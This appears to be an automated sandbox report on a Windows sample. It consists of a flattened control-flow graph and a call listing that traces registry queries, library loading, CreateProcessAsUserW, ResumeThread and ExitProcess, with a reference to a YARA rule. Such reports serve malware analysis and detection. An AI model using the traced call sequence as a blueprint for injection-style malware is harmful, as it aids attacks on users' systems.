38342->38343 38344 2c543e8 38342->38344 38355 2c54130 38343->38355 38346 2c54419 38344->38346 38349 2c5442a 38344->38349 38360 2c5435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38346->38360 38351 2c5446f FreeLibrary 38349->38351 38352 2c54493 38349->38352 38350 2c54423 38350->38349 38351->38349 38353 2c544a2 ExitProcess 38352->38353 38354 2c5449c 38352->38354 38354->38353 38356 2c54173 38355->38356 38357 2c54140 38355->38357 38356->38339 38357->38356 38358 2c515cc VirtualAlloc 38357->38358 38361 2c55868 38357->38361 38358->38357 38360->38350 38362 2c55894 38361->38362 38363 2c55878 GetModuleFileNameA 38361->38363 38362->38357 38365 2c55acc GetModuleFileNameA RegOpenKeyExA 38363->38365 38366 2c55b4f 38365->38366 38367 2c55b0f RegOpenKeyExA 38365->38367 38383 2c55908 12 API calls 38366->38383 38367->38366 38368 2c55b2d RegOpenKeyExA 38367->38368 38368->38366 38370 2c55bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 38368->38370 38372 2c55cf2 38370->38372 38373 2c55c0f 38370->38373 38371 2c55b74 RegQueryValueExA 38374 2c55b94 RegQueryValueExA 38371->38374 38375 2c55bb2 RegCloseKey 38371->38375 38372->38362 38373->38372 38377 2c55c1f lstrlenA 38373->38377 38374->38375 38375->38362 38378 2c55c37 38377->38378 38378->38372 38379 2c55c84 38378->38379 38380 2c55c5c lstrcpynA LoadLibraryExA 38378->38380 38379->38372 38381 2c55c8e lstrcpynA LoadLibraryExA 38379->38381 38380->38379 38381->38372 38382 2c55cc0 lstrcpynA LoadLibraryExA 38381->38382 38382->38372 38383->38371 38384 2c78128 38385 2c54860 11 API calls 38384->38385 38386 2c78149 38385->38386 38387 2c547ec 11 API calls 38386->38387 38388 2c78180 38387->38388 38389 2c689d0 20 API calls 38388->38389 38390 2c781a4 38389->38390 38391 2c54860 11 API calls 38390->38391 38392 2c781c5 38391->38392 38393 2c547ec 11 API calls 38392->38393 38394 2c781fc 38393->38394 38395 2c689d0 20 API calls 38394->38395 38396 2c78220 38395->38396 38397 2c54860 11 API calls 38396->38397 38398 2c78241 38397->38398 38399 2c547ec 11 API calls 38398->38399 38400 2c78278 38399->38400 38401 2c689d0 20 API calls 38400->38401 38402 2c7829c 38401->38402 38403 2c54860 11 API calls 38402->38403 38404 2c782bd 38403->38404 38405 2c547ec 11 API calls 38404->38405 38406 2c782f4 38405->38406 38407 2c689d0 20 API calls 38406->38407 38408 2c78318 38407->38408 38409 2c54860 11 API calls 38408->38409 38410 2c78339 38409->38410 38411 2c547ec 11 API calls 38410->38411 38412 2c78370 38411->38412 38413 2c689d0 20 API calls 38412->38413 38414 2c78394 38413->38414 38415 2c54860 11 API calls 38414->38415 38416 2c783b5 38415->38416 38417 2c547ec 11 API calls 38416->38417 38418 2c783ec 38417->38418 38419 2c689d0 20 API calls 38418->38419 38420 2c78410 38419->38420 38421 2c54860 11 API calls 38420->38421 38422 2c78431 38421->38422 38423 2c547ec 11 API calls 38422->38423 38424 2c78468 38423->38424 38425 2c689d0 20 API calls 38424->38425 38426 2c7848c 38425->38426 38427 2c54860 11 API calls 38426->38427 38428 2c784ad 38427->38428 38429 2c547ec 11 API calls 38428->38429 38430 2c784e4 38429->38430 38431 2c689d0 20 API calls 38430->38431 38432 2c78508 38431->38432 38433 2c793a1 38432->38433 38434 2c7851d 38432->38434 38435 2c54860 11 API calls 38433->38435 38436 2c54860 11 API calls 38434->38436 38438 2c793c2 38435->38438 38437 2c7853e 38436->38437 38439 2c78556 38437->38439 38440 2c547ec 11 API calls 38438->38440 38441 2c547ec 11 API calls 38439->38441 38444 2c793f9 38440->38444 38442 2c78575 38441->38442 38443 2c7858d 38442->38443 38445 2c689d0 20 API calls 38443->38445 38446 2c689d0 20 API calls 38444->38446 38447 2c78599 38445->38447 38448 2c7941d 38446->38448 38450 2c54860 11 API calls 38447->38450 38449 2c54860 11 API calls 38448->38449 38452 2c7943e 38449->38452 38451 2c785ba 38450->38451 38453 2c785c5 38451->38453 38454 2c547ec 11 API calls 38452->38454 38455 2c547ec 11 API calls 38453->38455 38457 2c79475 38454->38457 38456 2c785f1 38455->38456 38458 2c785fc 38456->38458 38460 2c689d0 20 API calls 38457->38460 38459 2c689d0 20 API calls 38458->38459 38461 2c78615 38459->38461 38462 2c79499 38460->38462 38463 2c54860 11 API calls 38461->38463 38464 2c54860 11 API calls 38462->38464 38466 2c78636 38463->38466 38465 2c794ba 38464->38465 38467 2c547ec 11 API calls 38465->38467 38468 2c547ec 11 API calls 38466->38468 38469 2c794f1 38467->38469 38470 2c7866d 38468->38470 38471 2c689d0 20 API calls 38469->38471 38472 2c689d0 20 API calls 38470->38472 38479 2c79515 38471->38479 38473 2c78691 38472->38473 38474 2c547ec 11 API calls 38473->38474 38475 2c786bd 38474->38475 38478 2c786d5 38475->38478 38476 2c79cf5 38477 2c54860 11 API calls 38476->38477 38481 2c79d16 38477->38481 38482 2c786e0 CreateProcessAsUserW 38478->38482 38479->38476 38480 2c54860 11 API calls 38479->38480 38488 2c79560 38480->38488 38485 2c547ec 11 API calls 38481->38485 38483 2c786f2 38482->38483 38484 2c7876e 38482->38484 38487 2c54860 11 API calls 38483->38487 38486 2c54860 11 API calls 38484->38486 38492 2c79d4d 38485->38492 38493 2c7878f 38486->38493 38489 2c78713 38487->38489 38490 2c547ec 11 API calls 38488->38490 38491 2c7871e 38489->38491 38498 2c79597 38490->38498 38496 2c547ec 11 API calls 38491->38496 38494 2c689d0 20 API calls 38492->38494 38495 2c547ec 11 API calls 38493->38495 38499 2c79d71 38494->38499 38503 2c787c6 38495->38503 38497 2c7874a 38496->38497 38501 2c78755 38497->38501 38502 2c689d0 20 API calls 38498->38502 38500 2c54860 11 API calls 38499->38500 38506 2c79d92 38500->38506 38508 2c689d0 20 API calls 38501->38508 38504 2c795bb 38502->38504 38507 2c689d0 20 API calls 38503->38507 38505 2c54860 11 API calls 38504->38505 38512 2c795dc 38505->38512 38510 2c547ec 11 API calls 38506->38510 38509 2c787ea 38507->38509 38508->38484 38511 2c54860 11 API calls 38509->38511 38514 2c79dc9 38510->38514 38515 2c7880b 38511->38515 38513 2c547ec 11 API calls 38512->38513 38518 2c79613 38513->38518 38516 2c689d0 20 API calls 38514->38516 38517 2c547ec 11 API calls 38515->38517 38519 2c79ded 38516->38519 38523 2c78842 38517->38523 38521 2c689d0 20 API calls 38518->38521 38520 2c54860 11 API calls 38519->38520 38525 2c79e0e 38520->38525 38522 2c79637 38521->38522 38524 2c54860 11 API calls 38522->38524 38526 2c689d0 20 API calls 38523->38526 38529 2c79658 38524->38529 38528 2c547ec 11 API calls 38525->38528 38527 2c78866 38526->38527 38530 2c549f8 11 API calls 38527->38530 38533 2c79e45 38528->38533 38532 2c547ec 11 API calls 38529->38532 38531 2c7888a 38530->38531 38534 2c54860 11 API calls 38531->38534 38537 2c7968f 38532->38537 38535 2c689d0 20 API calls 38533->38535 38536 2c788b9 38534->38536 38540 2c79e69 38535->38540 38541 2c788c4 38536->38541 38538 2c689d0 20 API calls 38537->38538 38539 2c796b3 38538->38539 38542 2c6f094 11 API calls 38539->38542 38546 2c689d0 20 API calls 38540->38546 38543 2c547ec 11 API calls 38541->38543 38545 2c796ce 38542->38545 38544 2c788f0 38543->38544 38549 2c788fb 38544->38549 38547 2c54860 11 API calls 38545->38547 38548 2c79e9c 38546->38548 38550 2c796f7 38547->38550 38552 2c689d0 20 API calls 38548->38552 38551 2c689d0 20 API calls 38549->38551 38554 2c54860 11 API calls 38550->38554 38553 2c78914 38551->38553 38556 2c79ecf 38552->38556 38555 2c54860 11 API calls 38553->38555 38557 2c7972f 38554->38557 38558 2c78935 38555->38558 38559 2c689d0 20 API calls 38556->38559 38560 2c547ec 11 API calls 38557->38560 38561 2c547ec 11 API calls 38558->38561 38562 2c79f02 38559->38562 38564 2c79766 38560->38564 38563 2c7896c 38561->38563 38565 2c689d0 20 API calls 38562->38565 38568 2c689d0 20 API calls 38563->38568 38566 2c689d0 20 API calls 38564->38566 38567 2c79f35 38565->38567 38569 2c7978a 38566->38569 38570 2c54860 11 API calls 38567->38570 38571 2c78990 38568->38571 38572 2c54860 11 API calls 38569->38572 38574 2c79f56 38570->38574 38573 2c54860 11 API calls 38571->38573 38575 2c797ab 38572->38575 38576 2c789b1 38573->38576 38577 2c547ec 11 API calls 38574->38577 38578 2c547ec 11 API calls 38575->38578 38579 2c547ec 11 API calls 38576->38579 38580 2c79f8d 38577->38580 38581 2c797e2 38578->38581 38582 2c789e8 38579->38582 38583 2c689d0 20 API calls 38580->38583 38586 2c689d0 20 API calls 38581->38586 38585 2c689d0 20 API calls 38582->38585 38584 2c79fb1 38583->38584 38587 2c54860 11 API calls 38584->38587 38588 2c78a0c 38585->38588 38589 2c79806 38586->38589 38599 2c79fd2 38587->38599 39019 2c6d164 23 API calls 38588->39019 38590 2c57e5c GetFileAttributesA 38589->38590 38592 2c79810 38590->38592 38594 2c79aef 38592->38594 38595 2c79818 38592->38595 38593 2c78a20 38596 2c54860 11 API calls 38593->38596 38598 2c54860 11 API calls 38594->38598 38597 2c54860 11 API calls 38595->38597 38601 2c78a46 38596->38601 38602 2c79839 38597->38602 38603 2c79b10 38598->38603 38600 2c547ec 11 API calls 38599->38600 38607 2c7a009 38600->38607 38604 2c547ec 11 API calls 38601->38604 38605 2c547ec 11 API calls 38602->38605 38606 2c547ec 11 API calls 38603->38606 38610 2c78a7d 38604->38610 38611 2c79870 38605->38611 38612 2c79b47 38606->38612 38608 2c689d0 20 API calls 38607->38608 38609 2c7a02d 38608->38609 38613 2c54860 11 API calls 38609->38613 38614 2c689d0 20 API calls 38610->38614 38617 2c689d0 20 API calls 38611->38617 38615 2c689d0 20 API calls 38612->38615 38623 2c7a04e 38613->38623 38616 2c78aa1 38614->38616 38619 2c79b6b 38615->38619 38620 2c54860 11 API calls 38616->38620 38618 2c79894 38617->38618 38621 2c54860 11 API calls 38618->38621 38622 2c54860 11 API calls 38619->38622 38625 2c78ac2 38620->38625 38626 2c798b5 38621->38626 38627 2c79b8c 38622->38627 38624 2c547ec 11 API calls 38623->38624 38631 2c7a085 38624->38631 38628 2c547ec 11 API calls 38625->38628 38629 2c547ec 11 API calls 38626->38629 38630 2c547ec 11 API calls 38627->38630 38633 2c78af9 38628->38633 38634 2c798ec 38629->38634 38635 2c79bc3 38630->38635 38632 2c689d0 20 API calls 38631->38632 38640 2c7a0a9 38632->38640 38636 2c689d0 20 API calls 38633->38636 38638 2c689d0 20 API calls 38634->38638 38639 2c689d0 20 API calls 38635->38639 38637 2c78b1d 38636->38637 38642 2c54860 11 API calls 38637->38642 38643 2c79910 38638->38643 38641 2c79be7 38639->38641 38645 2c689d0 20 API calls 38640->38645 38644 2c54860 11 API calls 38641->38644 38647 2c78b3e 38642->38647 38646 2c54860 11 API calls 38643->38646 38649 2c79c08 38644->38649 38650 2c7a0dc 38645->38650 38648 2c79931 38646->38648 38651 2c547ec 11 API calls 38647->38651 38652 2c547ec 11 API calls 38648->38652 38653 2c547ec 11 API calls 38649->38653 38654 2c689d0 20 API calls 38650->38654 38655 2c78b75 38651->38655 38656 2c79968 38652->38656 38657 2c79c3f 38653->38657 38658 2c7a10f 38654->38658 38659 2c689d0 20 API calls 38655->38659 38660 2c689d0 20 API calls 38656->38660 38661 2c689d0 20 API calls 38657->38661 38662 2c689d0 20 API calls 38658->38662 38663 2c78b99 38659->38663 38664 2c7998c 38660->38664 38665 2c79c63 38661->38665 38673 2c7a142 38662->38673 38666 2c78ba2 38663->38666 38667 2c78bb9 38663->38667 38670 2c6e358 11 API calls 38664->38670 38671 2c54860 11 API calls 38665->38671 39020 2c68730 17 API calls 38666->39020 38669 2c54860 11 API calls 38667->38669 38679 2c78bda 38669->38679 38672 2c799a1 38670->38672 38677 2c79c84 38671->38677 38674 2c54530 11 API calls 38672->38674 38678 2c689d0 20 API calls 38673->38678 38675 2c799b1 38674->38675 38676 2c54860 11 API calls 38675->38676 38682 2c799d2 38676->38682 38680 2c547ec 11 API calls 38677->38680 38683 2c7a175 38678->38683 38681 2c547ec 11 API calls 38679->38681 38685 2c79cbb 38680->38685 38687 2c78c11 38681->38687 38684 2c547ec 11 API calls 38682->38684 38686 2c689d0 20 API calls 38683->38686 38695 2c79a09 38684->38695 38689 2c689d0 20 API calls 38685->38689 38688 2c7a1a8 38686->38688 38691 2c689d0 20 API calls 38687->38691 38690 2c54860 11 API calls 38688->38690 38692 2c79cdf 38689->38692 38700 2c7a1c9 38690->38700 38693 2c78c35 38691->38693 38696 2c549f8 11 API calls 38692->38696 38694 2c54860 11 API calls 38693->38694 38703 2c78c56 38694->38703 38698 2c689d0 20 API calls 38695->38698 38697 2c79ce9 38696->38697 39021 2c68d70 31 API calls 38697->39021 38701 2c79a2d 38698->38701 38702 2c547ec 11 API calls 38700->38702 38704 2c54860 11 API calls 38701->38704 38707 2c7a200 38702->38707 38705 2c547ec 11 API calls 38703->38705 38706 2c79a4e 38704->38706 38710 2c78c8d 38705->38710 38708 2c547ec 11 API calls 38706->38708 38709 2c689d0 20 API calls 38707->38709 38715 2c79a85 38708->38715 38711 2c7a224 38709->38711 38713 2c689d0 20 API calls 38710->38713 38712 2c54860 11 API calls 38711->38712 38718 2c7a245 38712->38718 38714 2c78cb1 38713->38714 38716 2c54860 11 API calls 38714->38716 38717 2c689d0 20 API calls 38715->38717 38719 2c78cd2 38716->38719 38723 2c79aa9 38717->38723 38720 2c547ec 11 API calls 38718->38720 38721 2c547ec 11 API calls 38719->38721 38722 2c7a27c 38720->38722 38726 2c78d09 38721->38726 38725 2c689d0 20 API calls 38722->38725 38724 2c6dc8c 17 API calls 38723->38724 38724->38594 38729 2c7a2a0 38725->38729 38727 2c689d0 20 API calls 38726->38727 38728 2c78d2d ResumeThread 38727->38728 38730 2c54860 11 API calls 38728->38730 38731 2c689d0 20 API calls 38729->38731 38733 2c78d59 38730->38733 38732 2c7a2d3 38731->38732 38734 2c54860 11 API calls 38732->38734 38735 2c547ec 11 API calls 38733->38735 38736 2c7a2f4 38734->38736 38738 2c78d90 38735->38738 38737 2c547ec 11 API calls 38736->38737 38741 2c7a32b 38737->38741 38739 2c689d0 20 API calls 38738->38739 38740 2c78db4 38739->38740 38742 2c54860 11 API calls 38740->38742 38743 2c689d0 20 API calls 38741->38743 38746 2c78dd5 38742->38746 38744 2c7a34f 38743->38744 38745 2c54860 11 API calls 38744->38745 38748 2c7a370 38745->38748 38747 2c547ec 11 API calls 38746->38747 38750 2c78e0c 38747->38750 38749 2c547ec 11 API calls 38748->38749 38753 2c7a3a7 38749->38753 38751 2c689d0 20 API calls 38750->38751 38752 2c78e30 38751->38752 38754 2c54860 11 API calls 38752->38754 38755 2c689d0 20 API calls 38753->38755 38758 2c78e51 38754->38758 38756 2c7a3cb 38755->38756 38757 2c54860 11 API calls 38756->38757 38760 2c7a3ec 38757->38760 38759 2c547ec 11 API calls 38758->38759 38761 2c78e88 38759->38761 38762 2c547ec 11 API calls 38760->38762 38763 2c689d0 20 API calls 38761->38763 38765 2c7a423 38762->38765 38764 2c78eac CloseHandle 38763->38764 38766 2c54860 11 API calls 38764->38766 38767 2c689d0 20 API calls 38765->38767 38768 2c78ed8 38766->38768 38769 2c7a447 38767->38769 38770 2c547ec 11 API calls 38768->38770 38771 2c689d0 20 API calls 38769->38771 38772 2c78f0f 38770->38772 38774 2c7a47a 38771->38774 38773 2c689d0 20 API calls 38772->38773 38775 2c78f33 38773->38775 38776 2c689d0 20 API calls 38774->38776 38777 2c54860 11 API calls 38775->38777 38778 2c7a4ad 38776->38778 38779 2c78f54 38777->38779 38780 2c689d0 20 API calls 38778->38780 38781 2c547ec 11 API calls 38779->38781 38782 2c7a4e0 38780->38782 38783 2c78f8b 38781->38783 38785 2c689d0 20 API calls 38782->38785 38784 2c689d0 20 API calls 38783->38784 38786 2c78faf 38784->38786 38787 2c7a513 38785->38787 38788 2c54860 11 API calls 38786->38788 38789 2c54860 11 API calls 38787->38789 38791 2c78fd0 38788->38791 38790 2c7a534 38789->38790 38792 2c547ec 11 API calls 38790->38792 38793 2c547ec 11 API calls 38791->38793 38794 2c7a56b 38792->38794 38795 2c79007 38793->38795 38796 2c689d0 20 API calls 38794->38796 38797 2c689d0 20 API calls 38795->38797 38798 2c7a58f 38796->38798 38799 2c7902b 38797->38799 38801 2c54860 11 API calls 38798->38801 38800 2c54860 11 API calls 38799->38800 38803 2c7904c 38800->38803 38802 2c7a5b0 38801->38802 38804 2c547ec 11 API calls 38802->38804 38805 2c547ec 11 API calls 38803->38805 38806 2c7a5e7 38804->38806 38807 2c79083 38805->38807 38808 2c689d0 20 API calls 38806->38808 38809 2c689d0 20 API calls 38807->38809 38812 2c7a60b 38808->38812 38810 2c790a7 38809->38810 38811 2c54860 11 API calls 38810->38811 38813 2c790c8 38811->38813 38814 2c689d0 20 API calls 38812->38814 38815 2c547ec 11 API calls 38813->38815 38816 2c7a63e 38814->38816 38818 2c790ff 38815->38818 38817 2c689d0 20 API calls 38816->38817 38821 2c7a671 38817->38821 38819 2c689d0 20 API calls 38818->38819 38820 2c79123 38819->38820 38822 2c54860 11 API calls 38820->38822 38823 2c689d0 20 API calls 38821->38823 38824 2c79144 38822->38824 38826 2c7a6a4 38823->38826 38825 2c547ec 11 API calls 38824->38825 38828 2c7917b 38825->38828 38827 2c689d0 20 API calls 38826->38827 38829 2c7a6d7 38827->38829 38830 2c689d0 20 API calls 38828->38830 38832 2c689d0 20 API calls 38829->38832 38831 2c7919f 38830->38831 38833 2c54860 11 API calls 38831->38833 38834 2c7a70a 38832->38834 38836 2c791c0 38833->38836 38835 2c54860 11 API calls 38834->38835 38838 2c7a72b 38835->38838 38837 2c547ec 11 API calls 38836->38837 38840 2c791f7 38837->38840 38839 2c547ec 11 API calls 38838->38839 38841 2c7a762 38839->38841 38842 2c689d0 20 API calls 38840->38842 38844 2c689d0 20 API calls 38841->38844 38843 2c7921b 38842->38843 38847 2c6894c 21 API calls 38843->38847 38845 2c7a786 38844->38845 38846 2c54860 11 API calls 38845->38846 38851 2c7a7a7 38846->38851 38848 2c7923a 38847->38848 38849 2c6894c 21 API calls 38848->38849 38850 2c7924e 38849->38850 38852 2c6894c 21 API calls 38850->38852 38855 2c547ec 11 API calls 38851->38855 38853 2c79262 38852->38853 38854 2c6894c 21 API calls 38853->38854 38856 2c79276 38854->38856 38859 2c7a7de 38855->38859 38857 2c6894c 21 API calls 38856->38857 38858 2c7928a 38857->38858 38860 2c6894c 21 API calls 38858->38860 38862 2c689d0 20 API calls 38859->38862 38861 2c7929e CloseHandle 38860->38861 38863 2c54860 11 API calls 38861->38863 38864 2c7a802 38862->38864 38866 2c792ca 38863->38866 38865 2c54860 11 API calls 38864->38865 38867 2c7a823 38865->38867 38868 2c547ec 11 API calls 38866->38868 38869 2c547ec 11 API calls 38867->38869 38870 2c79301 38868->38870 38872 2c7a85a 38869->38872 38871 2c689d0 20 API calls 38870->38871 38873 2c79325 38871->38873 38874 2c689d0 20 API calls 38872->38874 38875 2c54860 11 API calls 38873->38875 38876 2c7a87e 38874->38876 38878 2c79346 38875->38878 38877 2c54860 11 API calls 38876->38877 38879 2c7a89f 38877->38879 38880 2c547ec 11 API calls 38878->38880 38881 2c547ec 11 API calls 38879->38881 38882 2c7937d 38880->38882 38884 2c7a8d6 38881->38884 38883 2c689d0 20 API calls 38882->38883 38883->38433 38885 2c689d0 20 API calls 38884->38885 38886 2c7a8fa 38885->38886 38887 2c54860 11 API calls 38886->38887 38888 2c7a91b 38887->38888 38889 2c547ec 11 API calls 38888->38889 38890 2c7a952 38889->38890 38891 2c689d0 20 API calls 38890->38891 38892 2c7a976 38891->38892 38893 2c689d0 20 API calls 38892->38893 38894 2c7a985 38893->38894 38895 2c689d0 20 API calls 38894->38895 38896 2c7a994 38895->38896 38897 2c689d0 20 API calls 38896->38897 38898 2c7a9a3 38897->38898 38899 2c689d0 20 API calls 38898->38899 38900 2c7a9b2 38899->38900 38901 2c689d0 20 API calls 38900->38901 38902 2c7a9c1 38901->38902 38903 2c689d0 20 API calls 38902->38903 38904 2c7a9d0 38903->38904 38905 2c689d0 20 API calls 38904->38905 38906 2c7a9df 38905->38906 38907 2c689d0 20 API calls 38906->38907 38908 2c7a9ee 38907->38908 38909 2c689d0 20 API calls 38908->38909 38910 2c7a9fd 38909->38910 38911 2c689d0 20 API calls 38910->38911 38912 2c7aa0c 38911->38912 38913 2c689d0 20 API calls 38912->38913 38914 2c7aa1b 38913->38914 38915 2c689d0 20 API calls 38914->38915 38916 2c7aa2a 38915->38916 38917 2c689d0 20 API calls 38916->38917 38918 2c7aa39 38917->38918 38919 2c689d0 20 API calls 38918->38919 38920 2c7aa48 38919->38920 38921 2c689d0 20 API calls 38920->38921 38922 2c7aa57 38921->38922 38923 2c54860 11 API calls 38922->38923 38924 2c7aa78 38923->38924 38925 2c547ec 11 API calls 38924->38925 38926 2c7aaaf 38925->38926 38927 2c689d0 20 API calls 38926->38927 38928 2c7aad3 38927->38928 38929 2c689d0 20 API calls 38928->38929 38930 2c7ab06 38929->38930 38931 2c689d0 20 API calls 38930->38931 38932 2c7ab39 38931->38932 38933 2c689d0 20 API calls 38932->38933 38934 2c7ab6c 38933->38934 38935 2c689d0 20 API calls 38934->38935 38936 2c7ab9f 38935->38936 38937 2c689d0 20 API calls 38936->38937 38938 2c7abd2 38937->38938 38939 2c689d0 20 API calls 38938->38939 38940 2c7ac05 38939->38940 38941 2c689d0 20 API calls 38940->38941 38942 2c7ac38 38941->38942 38943 2c54860 11 API calls 38942->38943 38944 2c7ac59 38943->38944 38945 2c547ec 11 API calls 38944->38945 38946 2c7ac90 38945->38946 38947 2c689d0 20 API calls 38946->38947 38948 2c7acb4 38947->38948 38949 2c54860 11 API calls 38948->38949 38950 2c7acd5 38949->38950 38951 2c547ec 11 API calls 38950->38951 38952 2c7ad0c 38951->38952 38953 2c689d0 20 API calls 38952->38953 38954 2c7ad30 38953->38954 38955 2c54860 11 API calls 38954->38955 38956 2c7ad51 38955->38956 38957 2c547ec 11 API calls 38956->38957 38958 2c7ad88 38957->38958 38959 2c689d0 20 API calls 38958->38959 38960 2c7adac 38959->38960 38961 2c689d0 20 API calls 38960->38961 38962 2c7addf 38961->38962 38963 2c689d0 20 API calls 38962->38963 38964 2c7ae12 38963->38964 38965 2c689d0 20 API calls 38964->38965 38966 2c7ae45 38965->38966 38967 2c689d0 20 API calls 38966->38967 38968 2c7ae78 38967->38968 38969 2c689d0 20 API calls 38968->38969 38970 2c7aeab 38969->38970 38971 2c689d0 20 API calls 38970->38971 38972 2c7aede 38971->38972 38973 2c689d0 20 API calls 38972->38973 38974 2c7af11 38973->38974 38975 2c689d0 20 API calls 38974->38975 38976 2c7af44 38975->38976 38977 2c689d0 20 API calls 38976->38977 38978 2c7af77 38977->38978 38979 2c689d0 20 API calls 38978->38979 38980 2c7afaa 38979->38980 38981 2c689d0 20 API calls 38980->38981 38982 2c7afdd 38981->38982 38983 2c689d0 20 API calls 38982->38983 38984 2c7b010 38983->38984 38985 2c689d0 20 API calls 38984->38985 38986 2c7b043 38985->38986 38987 2c689d0 20 API calls 38986->38987 38988 2c7b076 38987->38988 38989 2c689d0 20 API calls 38988->38989 38990 2c7b0a9 38989->38990 38991 2c689d0 20 API calls 38990->38991 38992 2c7b0dc 38991->38992 38993 2c689d0 20 API calls 38992->38993 38994 2c7b10f 38993->38994 38995 2c689d0 20 API calls 38994->38995 38996 2c7b142 38995->38996 38997 2c689d0 20 API calls 38996->38997 38998 2c7b175 38997->38998 38999 2c68338 18 API calls 38998->38999 39000 2c7b184 38999->39000 39001 2c54860 11 API calls 39000->39001 39002 2c7b1a5 39001->39002 39003 2c547ec 11 API calls 39002->39003 39004 2c7b1dc 39003->39004 39005 2c689d0 20 API calls 39004->39005 39006 2c7b200 39005->39006 39007 2c54860 11 API calls 39006->39007 39008 2c7b221 39007->39008 39009 2c547ec 11 API calls 39008->39009 39010 2c7b258 39009->39010 39011 2c689d0 20 API calls 39010->39011 39012 2c7b27c 39011->39012 39013 2c54860 11 API calls 39012->39013 39014 2c7b29d 39013->39014 39015 2c547ec 11 API calls 39014->39015 39016 2c7b2d4 39015->39016 39017 2c689d0 20 API calls 39016->39017 39018 2c7b2f8 ExitProcess 39017->39018 39019->38593 39020->38667 39021->38476

                                                                        Executed Functions

                                                                        Function 02C78128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 4574 2c78128-2c78517 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c548ec 4689 2c793a1-2c79524 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c548ec 4574->4689 4690 2c7851d-2c786f0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c547ec call 2c549a0 call 2c54d74 call 2c54df0 CreateProcessAsUserW 4574->4690 4780 2c79cf5-2c7b2fa call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 * 16 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 